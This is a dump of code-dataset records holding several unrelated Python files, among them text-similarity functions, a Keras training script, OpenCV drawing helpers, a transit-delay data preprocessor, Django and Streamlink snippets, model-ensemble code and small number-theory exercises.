create_vectors(txt_one_dict, txt_two_dict, union):\n \"\"\"\n Takes in two dictionaries and a set to create a vector.\n For each word if it exists it puts the count there if it does not it puts 0.\n :param txt_one_dict: dictionary\n :param txt_two_dict: dictionary\n :param union: set\n :return: list\n \"\"\"\n # Creating vector for first txt\n vector_one = []\n for word in union:\n try:\n vector_one.append(txt_one_dict[word])\n except KeyError:\n vector_one.append(0)\n\n # Creating vector for second txt\n vector_two = []\n for word in union:\n try:\n vector_two.append(txt_two_dict[word])\n except KeyError:\n vector_two.append(0)\n return vector_one, vector_two\n\n\ndef create_dot_product(vec_one, vec_two):\n \"\"\"\n Intakes two vectors and multiplies them together to get a product\n Multiplies element 0 in list 1 with element 0 in list 2, element 1 in list 1 with element 1 in list 2\n :param vec_one: list\n :param vec_two: list\n :return: int\n \"\"\"\n dot_product = sum(v1_element * v2_element for v1_element, v2_element in zip(vec_one, vec_two))\n return dot_product\n\n\ndef create_divisor(vec_one, vec_two):\n \"\"\"\n Intakes two vectors and the divisor for the function\n :param vec_one: list\n :param vec_two: list\n :return: float\n \"\"\"\n vec_one_divisor = sum((item ** 2 for item in vec_one))\n vec_one_divisor = math.sqrt(vec_one_divisor)\n vec_two_divisor = sum((item ** 2 for item in vec_two))\n vec_two_divisor = math.sqrt(vec_two_divisor)\n return vec_one_divisor, vec_two_divisor\n\n\ndef determine_txt_similarity(txt_one, txt_two):\n \"\"\"\n This function takes in two string and apply all the functions above to\n result in a score from (0 to 1) of text similarity\n :param txt_one: string\n :param txt_two: string\n :return: float\n \"\"\"\n # Txt One Preparation (Cleaning and then getting the dict of word count)\n txt_one_clean = strip_document(txt_one)\n txt_one_clean = lower_case(txt_one_clean)\n txt_one_clean = replace_contraction(txt_one_clean)\n txt_one_clean = keep_alphanum(txt_one_clean)\n txt_one_clean = remove_stop_words(txt_one_clean)\n txt_one_count = word_count(txt_one_clean)\n\n # Txt Two Preparation (Cleaning and then getting the dict of word count)\n txt_two_clean = strip_document(txt_two)\n txt_two_clean = lower_case(txt_two_clean)\n txt_two_clean = replace_contraction(txt_two_clean)\n txt_two_clean = keep_alphanum(txt_two_clean)\n txt_two_clean = remove_stop_words(txt_two_clean)\n txt_two_count = word_count(txt_two_clean)\n\n # Getting the Union of the two texts (words)\n txt_union = create_txt_union(txt_one_clean, txt_two_clean)\n\n # Creating the vectors for our calculation\n vec_one, vec_two = create_vectors(txt_one_count, txt_two_count, txt_union)\n\n # Getting the Dot Product\n dot_product = create_dot_product(vec_one, vec_two)\n\n # Creating the two divisors\n txt_one_divisor, txt_two_divisor = create_divisor(vec_one, vec_two)\n\n # Calculating the result\n result = dot_product/(txt_one_divisor * txt_two_divisor)\n\n return result\n\n\n#test_result = round(determine_txt_similarity(SAMPLE_TXT_ONE, SAMPLE_TXT_THREE),2)\n#print(test_result)","sub_path":"App/text_similarity.py","file_name":"text_similarity.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"639991818","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nimport tensorflow.keras as k\nfrom display import display_comparison_batch\nfrom autoencoder_v2 import create_model\nfrom model_helper import ModelHelper\nimport utils\n\n\ndef create_full_model(autoencoder, shape):\n model = create_model(shape, trainable=False)\n helper = ModelHelper()\n helper.set_model(model)\n helper.load_model(autoencoder)\n helper.pop()\n helper.pop()\n helper.add(\n k.layers.Conv3D(\n filters=64,\n kernel_size=(5, 5, 5),\n kernel_regularizer=k.regularizers.l2(),\n activation=\"relu\"\n )\n )\n helper.add(k.layers.Dropout(0.5))\n helper.add(\n k.layers.AveragePooling3D(\n (2, 2, 2),\n 2\n )\n )\n helper.add(\n k.layers.Conv3D(\n filters=32,\n kernel_size=(5, 5, 5),\n kernel_regularizer=k.regularizers.l2(),\n activation=\"relu\"\n )\n )\n helper.add(k.layers.Dropout(0.5))\n helper.add(\n k.layers.AveragePooling3D(\n (2, 2, 2),\n 2\n )\n )\n helper.add(k.layers.Flatten())\n helper.add(\n k.layers.Dense(\n units=500,\n activation=\"tanh\"\n )\n )\n helper.add(k.layers.Dropout(0.5))\n helper.add(k.layers.Dense(units=3))\n\n model = helper.model\n return model\n\n\nif __name__ == \"__main__\":\n autoencoder_loc = \"1554700196.69537-autoencoder\"\n shape = np.expand_dims(\n np.load(\n \"/home/matthew-lee/Data/ADNI/clean/batches/test_0_x.npy\"\n ),\n axis=4\n ).shape[1:]\n\n model = create_full_model(autoencoder_loc, shape)\n model.summary()\n\n\n #class_weights = np.load(\n # \"/home/matthew-lee/Data/ADNI/clean/train_weightings.npy\"\n #)\n\n\n\n batch_loc = \"/home/matthew-lee/Data/ADNI/clean/batches/\"\n train_gen = utils.batch_generator(batch_loc, \"train\")\n model.compile(\n optimizer=tf.train.AdamOptimizer(0.00002),\n loss=\"categorical_crossentropy\",\n metrics=['accuracy']\n )\n\n class_weights = {\n 0: 0.075,\n 1: 0.025,\n 2: 0.9\n }\n\n model.fit(\n train_gen,\n epochs=20,\n steps_per_epoch=300,\n workers=1,\n use_multiprocessing=False,\n class_weight=class_weights\n )\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535185691","text":"# draw overlay on an existing image using opencv\n\nimport cv2\nimport numpy as np\n\n\ndef draw_pts(img: np.ndarray, pts: np.ndarray, data_format='NHWC') -> np.ndarray:\n \"\"\"\n draw a sequence of points onto image\n :param img: raw image\n :param pts: A 3-D tensor, typical shape (batch_size, num_points, 2)\n :return:\n \"\"\"\n assert type(img) == np.ndarray\n assert img.ndim == 3\n try:\n assert data_format == 'NHWC'\n except AssertionError:\n print('data_format', data_format, 'is not implemented')\n for i in range(pts.shape[0]):\n img[i] = draw_pts_kernel(img[i], pts[i])\n return img\n\n\ndef draw_pts_kernel(img: np.ndarray, pts) -> np.ndarray:\n # pts: array-like\n for i in range(pts.shape[0]):\n cv2.circle(img, tuple(pts[i].astype(int)), 1, (0, 255, 0), 1)\n return img\n\n\ndef draw_bbx(img: np.ndarray, bbx: np.ndarray, data_format='NHWC') -> np.ndarray:\n assert type(img) == np.ndarray\n assert img.ndim == 3\n try:\n assert data_format == 'NHWC'\n except AssertionError:\n print('data_format', data_format, 'is not implemented')\n for i in range(bbx.shape[0]):\n img[i]= draw_bbx_kernel(img[i], bbx[i])\n return img\n\n\ndef draw_bbx_kernel(img: np.ndarray, bbx: np.ndarray) -> np.ndarray:\n \"\"\"\n\n :param img:\n :param bbx: A 1-D tensor with 4 elements, (x_min, y_min, x_max, y_max)\n :return:\n \"\"\"\n assert bbx.dtype == int\n assert bbx.ndim == 1\n assert bbx.shape[0] == 4\n img = cv2.rectangle(img, (bbx[0], bbx[1]), (bbx[2], bbx[3]), (0, 255, 0), 2)\n return img\n","sub_path":"draw_overlay.py","file_name":"draw_overlay.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"291426294","text":"import numpy as np\nimport pandas as pd\nimport pickle\n\n\"\"\"\nThis file preprocesses data from the dataframe\nAll the parameters are obtained from data used for training, thus every preprocessing is done \nusing the training data parameters\n\nThe preprocessor will not process the data unless the data provided feature columns are as per the requirement\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef clean_delay(df):\n df = df[df['Min Delay'].notna()]\n return df\n\ndef check_route(x):\n # This function checks for valid routes only\n # Valid routes are identified from the website, only routes where the streetcar are working\n\n # load the valid list of TTC Streetcar routes\n valid_routes = [501, 502, 503, 504, 505, 506, 509, 510, 511, 512, 301, 304, 306, 310]\n\n if x in valid_routes:\n return x\n else:\n return \"bad route\"\n\n# This function cleans the data based on valid routes\ndef clean_route(df):\n # This function takes dataframe as input\n # cleans the route column based on the validity of the route of street car\n # returns the cleaned dataframe\n df['Route'] = df['Route'].apply(lambda x:check_route(x))\n df = df[df.Route != \"bad route\"]\n df['Route'] = df['Route'].astype('int64')\n return df\n\n# This function drops the Location column\ndef drop_location(df):\n df = df.drop([\"Location\"], axis=1)\n return df\n\ndef create_date_time_column(df):\n # This function takes dataframe, then merges the date and time\n # Then convert that column into datetime datatype\n # Such that it can be further used in time series easily\n try:\n new = pd.to_datetime(df[\"Report Date\"] + \" \"+ df[\"Time\"], utc=True)\n df[\"Date Time\"] = new\n df = df.drop([\"Report Date\", \"Time\"], axis=1)\n return df\n except:\n return df\n\n# This function divides a day into different period\ndef day_divider(hour):\n if hour > 5 and hour < 12:\n return \"morning\"\n elif hour >= 12 and hour < 17:\n return \"afternoon\"\n elif hour >= 17 and hour < 21:\n return \"evening\"\n else:\n return \"night\"\n\n\nmin_gap_scaler_data = pickle.load(open(\"../Models/min_gap_scaler.pkl\", 'rb'))\nmin_gap_train_mean = min_gap_scaler_data[\"mean\"]\nmin_gap_train_std = min_gap_scaler_data[\"std\"]\n\ndef clean_gap(df):\n # This function will help to clean the Min Gap column feature with training data Min Gap mean value\n df[\"Min Gap\"] = df[\"Min Gap\"].fillna(min_gap_train_mean)\n return df\n\n# These function help to filter the Direction values and clean them\n\ndef check_direction (x):\n valid_directions = ['eb', 'wb', 'nb', 'sb', 'bw']\n if x in valid_directions:\n return(x)\n else:\n return(\"bad direction\")\n\ndef direction_cleanup(df):\n df['Direction'] = df['Direction'].str.lower()\n df['Direction'] = df['Direction'].str.replace('/','')\n df['Direction'] = df['Direction'].replace({'eastbound':'eb','westbound':'wb','southbound':'sb','northbound':'nb'})\n df['Direction'] = df['Direction'].apply(lambda x:check_direction(x))\n return(df)\n\ndef complete_cleaner(df):\n df = clean_delay(df) # drops the nan Min delay rows\n df = clean_route(df) # cleans the unwanted route from the dataset\n df = drop_location(df) # drops the location column from the dataset\n df = create_date_time_column(df) # creates Date Time column in the dataset\n df[\"Part of Day\"] = df.apply(lambda x: day_divider(x[\"Date Time\"].hour),axis=1) # Creates Part of Day column in the dataset\n df = clean_gap(df) # cleans gap based on the mean of gap values\n df = direction_cleanup(df) # cleans the direction column to 5 directions(eb,wb,nb,sb,bw)\n df = df[df[\"Direction\"] != \"bad direction\"]\n df.reset_index(inplace=True, drop=True)\n df.drop(['Date Time'], axis=1, inplace=True)\n return df\n\nday_enc = pickle.load(open(\"../Models/day_encoder.pkl\", 'rb'))\nroute_enc = pickle.load(open(\"../Models/route_encoder.pkl\", 'rb'))\ndir_enc = pickle.load(open(\"../Models/direction_encoder.pkl\", 'rb'))\npart_enc = pickle.load(open(\"../Models/part_of_day_encoder.pkl\", 'rb'))\n\ndef one_hot_encoder(df):\n # This function does one hot encoding of the day, route, direction, and part of day columns\n # The one hot encoder object for different features are created using training data\n # The same objects will be used for test data encoding\n df[day_enc.categories_[0]] = day_enc.transform(np.array(df[\"Day\"]).reshape(-1,1)).toarray()\n df[route_enc.categories_[0]] = route_enc.transform(np.array(df[\"Route\"]).reshape(-1,1)).toarray()\n df[dir_enc.categories_[0]] = dir_enc.transform(np.array(df[\"Direction\"]).reshape(-1,1)).toarray()\n df[part_enc.categories_[0]] = part_enc.transform(np.array(df[\"Part of Day\"]).reshape(-1,1)).toarray()\n\n df.drop(['Day', 'Route', 'Direction', 'Part of Day'], axis=1, inplace=True)\n return df\n\n\ndef min_gap_scaler(df):\n df[\"Min Gap\"] = (df[\"Min Gap\"]-min_gap_train_mean)/min_gap_train_std\n return df\n\ndef preprocessor(df):\n # This function does all the preprocessing\n selected_columns = ['Report Date', 'Route', 'Time', 'Day', 'Location', 'Direction',\n 'Min Delay', 'Min Gap']\n try:\n df = df[selected_columns]\n df = complete_cleaner(df)\n df = one_hot_encoder(df) # one hot encoder based on training samples\n df = min_gap_scaler(df) # feature scaler based on training sample\n print(\"------------------------\")\n if df.isnull().values.any():\n print(\"There are some null values\")\n else:\n print(\"Data is ready for testing\")\n return df\n except:\n print(\"The columns of the data are not matching and sufficient\")\n print(\"Provide proper data with the following headers : \", selected_columns)\n\n\n\n\n","sub_path":"Projects/Script/performance_preprocessor.py","file_name":"performance_preprocessor.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239346486","text":"from django.shortcuts import render\nfrom .models import Destination\n\n# Create your views here.\ndef index(request):\n des1 = Destination()\n des1.name= 'Dhaka'\n des1.desc = 'Ugly'\n des1.img = 'destination_1.jpg'\n des1.price = 650\n des1.offer = False\n\n\n des2 = Destination()\n des2.name = 'Dha'\n des2.desc = 'Uly'\n des2.img = 'destination_2.jpg'\n des2.price = 60\n des2.offer = True\n\n des3 = Destination()\n des3.name = 'Dhak'\n des3.desc = 'Ugy'\n des3.img = 'destination_3.jpg'\n des3.price = 50\n des3.offer = False\n\n dests = [des1,des2,des3]\n\n\n return render(request, 'index.html', {'dests': dests})","sub_path":"teles/travello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"471138691","text":"from subprocess import PIPE, Popen as popen\nimport re\n\nfrom django.core.management.base import BaseCommand\nimport django.utils.simplejson as json\n\nwget_bin = 'wget'\nwget_args = ['--output-document=-', '--quiet']\nwget_host = '127.0.0.1'\nwget_port = 8000\nwget_urls = [\n 'http://%s:%d/de/fhbrs/' % (wget_host, wget_port),\n 'http://%s:%d/en/fhbrs/' % (wget_host, wget_port),\n]\n\njson_re = re.compile('\\-\\-\\[\\[JSON(.+)JSON\\]\\]\\-\\-', re.DOTALL)\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n loops = 1\n if len(args) >= 1:\n loops = int(args[0])\n self.stdout.write(\"Analysing FHBRS-Application ...\\r\\n\")\n results = []\n for loop in xrange(loops):\n for wget_url in wget_urls:\n self.stdout.write(\"\\tFetching '%s' ...\\r\\n\" % (wget_url))\n wget_cmd = [wget_bin.strip()] + wget_args + [wget_url]\n wget_pipe = popen(wget_cmd, stdout=PIPE)\n wget_out = wget_pipe.stdout.read()\n json_match = json_re.search(wget_out)\n json_text = json_match.group(1).strip()\n result = json.loads(json_text)\n #self.stdout.write(\"\\tAnalyse-Result:\\r\\n\")\n #for key, value in result.iteritems():\n # self.stdout.write(\"\\t\\t%s: %s\\r\\n\" % (str(key), str(value)))\n results.append(result)\n self.stdout.write(\"\\r\\n\")\n render_time_key = 'request-to-response-time'\n render_times = [result[render_time_key] for result in results]\n render_time_avg = sum(render_times) / len(render_times)\n self.stdout.write(\"Analyse-Render-Time-Avg: %f\\r\\n\" % (render_time_avg))\n sql_query_count_key = 'sql-query-count'\n sql_query_counts = [result[sql_query_count_key] for result in results]\n sql_query_count_avg = float(sum(sql_query_counts)) / len(sql_query_counts)\n self.stdout.write(\"Analyse-SQL-Query-Count-Avg: %f\\r\\n\" % (sql_query_count_avg))\n return","sub_path":"fhbrs/management/commands/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525892636","text":"import math\r\ndef fibonacci(n):\r\n if (n < 0):\r\n return -1;\r\n elif (n == 0 or n == 1):\r\n return n;\r\n else:\r\n return fibonacci(n - 1) + fibonacci(n - 2);\r\n \r\ndef isPrimeNumber(n):\r\n if (n < 2):\r\n return False;\r\n squareRoot = int(math.sqrt(n));\r\n for i in range(2, squareRoot + 1):\r\n if (n % i == 0):\r\n return False;\r\n return True;\r\n \r\nn = int(input(\"Nhập số nguyên dương n = \"));\r\nprint (\"Tất cả các số fibonacci nhỏ hơn\", n, \"và nguyên tố:\");\r\ni = 0;\r\nfin = fibonacci(i);\r\nwhile(fin < n):\r\n fin = fibonacci(i);\r\n if (isPrimeNumber(fin)):\r\n print(fin)\r\n i = i + 1;\r\n","sub_path":"4.18.py","file_name":"4.18.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"37087103","text":"tasks = []\n\nwhile True:\n print(\"Insert the number corresponding to the action you want to perform:\")\n\n print(\"\\t1. insert a new task;\")\n print(\"\\t2. remove a task;\")\n print(\"\\t3. show all the tasks;\")\n print(\"\\t4. close the program.\")\n\n try:\n ans = int(input(\"Your choice: \"))\n if ans == 1:\n new_task = input(\"Insert the task to insert: \")\n tasks.append(new_task)\n print(\"Task inserted.\")\n elif ans == 2:\n del_task = input(\"Insert the task to remove: \")\n try:\n tasks.remove(del_task)\n print(\"Task removed.\")\n except ValueError:\n print(\"Task not present.\")\n elif ans == 3:\n print(\"Inserted tasks:\")\n for task in tasks:\n print(task)\n elif ans == 4:\n break\n else:\n print(\"Not a valid number!\")\n except ValueError:\n print(\"Not a number!\")\n","sub_path":"python-lab1/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"52151627","text":"import os\r\n\r\n\r\n\r\n\r\nelement_threshold = 0.8\r\nrelation_threshold = 0.8\r\nrotated_relation_threshold=0.8\r\nsub_image_folder_for_ocr = r'/home/fei/Desktop/vis_results_old/temp_sub_images/'\r\n\r\n# train_task_id = '3T' + str(choice([1024, 1280, 1536, 1792, 2048]))\r\nmax_train_img_size = 736\r\ntrain_task_id = '3T' +str(max_train_img_size)\r\nDEBUG = True\r\n\r\n# train_task_id = '3T1500'\r\ninitial_epoch = 0\r\nepoch_num = 200\r\nlr = 1e-4\r\ndecay = 5e-5\r\n\r\n# clip_value = 0.5 # default 0.5, 0 means no clip\r\n\r\npatience = 40\r\nload_weights = True\r\nlambda_inside_score_loss = 3.0\r\nlambda_cls_loss = 3.0\r\nlambda_side_vertex_code_loss = 1.0\r\nlambda_side_vertex_coord_loss = 1.0\r\n\r\n\r\ntotal_img = 2516\r\nvalidation_split_ratio = 0.25\r\n\r\n# max_train_img_size = int(train_task_id[-4:])\r\nmax_predict_img_size = max_train_img_size # int(train_task_id[-4:]) # 2400\r\n\r\nassert max_train_img_size in [512, 736, 1024, 1280, 1536, 1792, 2048], \\\r\n 'max_train_img_size must in [1024, 1280, 1536, 1792, 2048]'\r\nif max_train_img_size == 512:\r\n batch_size = 10\r\nelif max_train_img_size == 736:\r\n batch_size = 8\r\nelif max_train_img_size == 1024:\r\n batch_size = 5\r\nelif max_train_img_size == 1280:\r\n batch_size = 4\r\nelif max_train_img_size == 1536:\r\n batch_size = 3\r\nelif max_train_img_size == 1792:\r\n batch_size = 2\r\nelse:\r\n batch_size = 1\r\n\r\nsteps_per_epoch = total_img * (1 - validation_split_ratio) // batch_size\r\nvalidation_steps = total_img * validation_split_ratio // batch_size\r\n\r\ntrain_data_dir = r'C:\\Users\\LSC-110\\Desktop\\pubmed'\r\norigin_image_dir_name = r'Images'\r\norigin_txt_dir_name = r'labels'\r\ntrain_image_dir_name = r'images_%s' % train_task_id\r\ntrain_label_dir_name = r'labels_%s' % train_task_id\r\nshow_gt_image_dir_name = r'show_gt_images_%s' % train_task_id\r\nshow_act_image_dir_name = r'show_act_images_%s' % train_task_id\r\nval_fname = 'val_%s.txt' % train_task_id\r\ntrain_fname = 'train_%s.txt' % train_task_id\r\n\r\n# in paper it's 0.3, maybe to large to this problem\r\nshrink_ratio = 0.2\r\n# pixels between 0.2 and 0.6 are side pixels\r\nshrink_side_ratio = 0.8\r\nepsilon = 1e-4\r\n\r\nnum_channels = 3\r\nfeature_layers_range = range(5, 0, -1)\r\n\r\n# feature_layers_range = range(3, 0, -1)\r\nfeature_layers_num = len(feature_layers_range)\r\n# pixel_size = 4\r\npixel_size = 2 ** feature_layers_range[-1]\r\n\r\nlocked_layers = True\r\n\r\nif not os.path.exists('saved_models'):\r\n os.mkdir('saved_models')\r\n\r\nsaved_model_weights_file_path = r'saved_models\\model_weights.h5'\r\n\r\ntext_pixel_threshold = 0.8 # text foreground & background score\r\naction_pixel_threshold = 0.8 # relation foreground & background score\r\ntext_side_vertex_pixel_threshold = 0.85\r\naction_side_vertex_pixel_threshold = 0.85\r\ntext_trunc_threshold = 0.2\r\nnock_trunc_threshold = 0.05\r\narrow_trunc_threshold = 0.9\r\n\r\npredict_cut_text_line = False\r\npredict_write2txt = True\r\ncrop_width = 736\r\ncrop_height = 736\r\n\r\n# OCR configurations\r\ntest_home_folder = r'C:\\Users\\hefe\\Desktop\\use case' # home folder\r\nimage_folder = os.path.join(test_home_folder, \"images\")\r\nground_truth_folder = image_folder\r\npredict_folder = os.path.join(test_home_folder, \"predict\")\r\nfailed_folder = os.path.join(test_home_folder, \"failed\")\r\nprevious_dictionary_path = '' # none if not needed\r\n\r\nlog_file = os.path.join(predict_folder, \"log.txt\")\r\n# dictionary_path = os.path.join(predict_folder, \"gene_dictionary.xlsx\")\r\ndictionary_path = r\"./all_gene_names.json\"\r\nword_file = os.path.join(predict_folder, \"word_cloud.txt\") # word cloud\r\nall_results_file = os.path.join(predict_folder, \"all_results.txt\")\r\n\r\nOCR_hist_step_size = 15 # should perfectly divide 255\r\nOCR_hist_num_steps = 3 # num of steps to check\r\nOCR_hist_num_sub_steps = 3 # should perfectly divide step size\r\n#sub_step = step_size / num_sub_steps\r\n\r\ncandidate_threshold = 20 # do not show corrected_results if fuzz_ratio < candidate_threshold\r\nthreshold = 70 # do not proceed to next range unless best_fuzz_ratio > threshold\r\nearly_stop_threshold = 100 # for patience\r\n\r\npatience_2 = 10 # stop if x consecutive bests >= threshold\r\npatience = 3 # stop if x bests >= early_stop_threshold\r\n\r\nvertical_ratio_thresh = 1.5 # rotate 90c and 90cc if height / width >= vertical_ratio_thresh\r\ndetection_IoU_thresholds = [.1, .25, .5, .75] # threshold for evaluation\r\n\r\npadding = 50 # for deskew\r\nOCR_SCALE = 5 # for resizing image\r\nOCR_OFFSET = 0\r\n\r\n# relationship configuration\r\nrelationship_model = r'saved_models\\bottleneck_fc_model11.h5'\r\nsub_img_width_for_relation_predict = 196\r\nsub_img_height_for_relation_predict = 140\r\n# relationship_folder = os.path.join(test_home_folder, \"relationship\")\r\n# testing_data_folder = os.path.join(relationship_folder, \"test\")\r\n#not_classified_folder = os.path.join(test_home_folder, \"not_classified\")\r\n\r\n#different threshold configuration\r\nthreshold_start_point = 0.6\r\nthreshold_end_point = 0.99\r\nthreshold_step = 0.1\r\n# end of file\r\n","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"313280162","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom tv_series import views\n\nrouter = routers.DefaultRouter(trailing_slash=False)\nrouter.register(r'shows', views.ShowViewSet)\nrouter.register(r'episodes', views.EpisodeViewSet)\nrouter.register(r'genres', views.GenreViewSet)\n\nurlpatterns = [\n path('api/', include(router.urls)),\n]\n","sub_path":"backend/tv_series/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"72585510","text":"import logging\nimport re\n\nfrom streamlink.plugin import Plugin, PluginArgument, PluginArguments\nfrom streamlink.stream import HLSStream\nfrom streamlink.utils import parse_json\n\nlog = logging.getLogger(__name__)\n\nclass ElementalTv(Plugin):\n '''\n Support for Icelandic live channels streams on ruv.is\n '''\n API_GET_STREAM_URL = 'https://geo.spilari.ruv.is/channel/%s'\n \n url_re = re.compile(r'https?://(www\\.)?ruv\\.is/(sjon|ut)varp/beint(/\\w+|\\?channel=\\w+)')\n\n @classmethod\n def can_handle_url(cls, url):\n return cls.url_re.match(url) is not None\n\n def get_stream_url(self, channel_id):\n error_message = None\n url = self.API_GET_STREAM_URL % channel_id\n\n try:\n log.trace('API URL: {}', url)\n res_api = self.session.http.get(url)\n log.trace('API Response: {}', res_api.text)\n api_json = parse_json(res_api.text)\n\n if api_json.get('url'):\n return api_json.get('url')\n \n if api_json.get('message'):\n error_message = api_json.get('message')\n\n except:\n pass\n\n log.trace('Could not get stream URL')\n\n if error_message:\n log.trace('Error: {}', error_message)\n\n return None\n\n def get_channel_id(self):\n # If \"...channel=channel_id\" type URL\n arr = self.url.split('channel=')\n\n if len(arr) >= 2:\n return re.split(r'/|#|\\?|\\&', arr[1])[0]\n\n # if \".../beint/channel_id\" type URL\n url_parts = re.split(r'/|#|\\?', self.url)\n\n if len(url_parts) < 6:\n return None\n\n return url_parts[5]\n\n def _get_streams(self):\n # Get channel ID\n channel_id = None\n channel_id = self.get_channel_id()\n\n if not channel_id:\n log.debug('Channel ID not found')\n return\n\n log.trace('Channel ID: {}', channel_id)\n\n stream_url = self.get_stream_url(channel_id)\n\n if not stream_url:\n log.error('Could not get stream URL')\n return\n\n log.trace('Stream URL: {}', stream_url)\n\n streams = HLSStream.parse_variant_playlist(self.session, stream_url)\n\n if not streams:\n log.debug('Play whole m3u8 file')\n yield 'live', HLSStream(self.session, stream_url)\n else:\n log.debug('Play single stream')\n for s in streams.items():\n yield s\n\n\n__plugin__ = ElementalTv\n","sub_path":"ruv_is.py","file_name":"ruv_is.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"415044012","text":"import os\nimport numpy as np\n\nfrom models.models import CatBoost, kNN, ANNClassifier, LogRegression\nfrom log.plot import (plot_confusion_matrix, probability_threshold,\n regression_coefficients)\nfrom settings import MODELS_PATH, CLASSES\n\n\n\nclass ModelFactory:\n _single_models = {\n 'kNN': kNN,\n 'ANN': ANNClassifier,\n 'CatBoost': CatBoost,\n }\n @classmethod\n def get(cls, model_name):\n return cls._single_models[model_name]\n\n\n\n\nclass Ensemble:\n def __init__(self):\n self.out_of_fold_predictions = {'valid': [], 'test': []}\n self.single_models = []\n self.single_models_classes = []\n\n def single_model(self, model_name, model_id, num_input_features, num_output_classes, model_save_path, **aux_params):\n model = ModelFactory.get(model_name)\n return model(model_id, num_input_features, num_output_classes, model_save_path, **aux_params)\n\n def meta_model(self, model_id, model_save_path):\n return LogRegression(model_id, model_save_path)\n\n\n def iteration(self, model_name, model_id, X, y, classes, features,\n model_save_path, features_short=None, additinal_labels=False, **aux_params):\n num_input_features = len(features)\n num_output_classes = len(classes)\n\n model = self.single_model(model_name, model_id, num_input_features, num_output_classes, model_save_path, **aux_params)\n model.fit(X['train'], y['train'], X['valid'], y['valid'])\n if additinal_labels:\n preds_add = np.squeeze(model.predict(X['add']))\n agreed_filter = y['add'].to_numpy() == np.argmax(preds_add, axis=-1)\n X_add_agreed = X['add'][agreed_filter]\n y_add_agreed = y['add'][agreed_filter]\n\n X_train = X['train'].append(X_add_agreed, ignore_index=True)\n y_train = y['train'].append(y_add_agreed, ignore_index=True)\n model.fit(X_train, y_train, X['valid'], y['valid'])\n model.load()\n if features_short is not None:\n model.explain(X['train'], y['train'], features_short, classes)\n else:\n model.explain(X['test'], y['train'], features, classes)\n\n self.out_of_fold_predictions['valid'].append(model.predict(X['valid']))\n self.out_of_fold_predictions['test'].append(model.predict(X['test']))\n\n self.log_iteration_results(model, y['test'], model.predict(X['test']), classes)\n self.single_models.append(model_id)\n self.single_models_classes.append(classes)\n\n\n def stacked_iteration(self, model_id, y, model_save_path):\n metamodel = self.meta_model(model_id, model_save_path)\n stacked_val_predictions = np.hstack(self.out_of_fold_predictions['valid'])\n stacked_test_predictions = np.hstack(self.out_of_fold_predictions['test'])\n metamodel.fit(stacked_val_predictions, y['valid'])\n\n self.log_stacking_results(metamodel, y['test'],\n metamodel.predict(stacked_test_predictions))\n\n def log_iteration_results(self, model, labels, predictions, classes=CLASSES):\n save_path = model.model_path\n plot_confusion_matrix(labels, predictions, classes, model.model_id, save_path=save_path)\n probability_threshold(labels, predictions, save_path=save_path)\n\n def log_stacking_results(self, model, labels, predictions, classes=CLASSES):\n self.log_iteration_results(model, labels, predictions, classes)\n regression_coefficients(model, self.single_models,\n self.single_models_classes,\n model.model_path, classes=CLASSES)\n","sub_path":"classification/models/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"289538198","text":"import math\n\ntask = \"6\"\n\n# edit to the name of the input file\nf = open('uniqueproducts'+ task + '.txt', 'r')\nn,m = map(int, f.readline().strip().split())\nsubsets = []\n# replace from here to line 10 with your own logic\n# variables available are just n and m, which are as described in the problem\n\nall_primes = set([2,3])\nall_not_primes = set([])\n\ndef is_prime(n):\n if n in all_primes: return True\n if n in all_not_primes: return False\n if n < 2 or n%2 == 0: \n all_not_primes.add(n)\n return False\n if n < 9: \n all_primes.add(n)\n return True\n if n%3 == 0: \n all_not_primes.add(n)\n return False\n r = int(n**0.5)\n # since all primes > 3 are of the form 6n ± 1\n # start with f=5 (which is prime)\n # and test f, f+2 for being prime\n # then loop by 6. \n f = 5\n while f <= r:\n #print('\\t',f)\n if n % f == 0: \n all_not_primes.add(n)\n return False\n if n % (f+2) == 0: \n all_not_primes.add(n)\n return False\n f += 6\n all_primes.add(n)\n return True \n\n# https://stackoverflow.com/questions/16007204/factorizing-a-number-in-python\n# f = lambda n: (p:=[next(i for i in range(2, n+1) if n % i == 0)] if n>1 else [])+(f(n//p[0]) if p else [])\n\ndef f(n):\n if n <= 1:\n return []\n p = []\n i = 2\n while n > 1:\n if n % i == 0 and is_prime(i):\n p.append(i)\n n = n // i\n else:\n if i == 2:\n i += 1\n else:\n i += 2\n return p \n\n# get prime 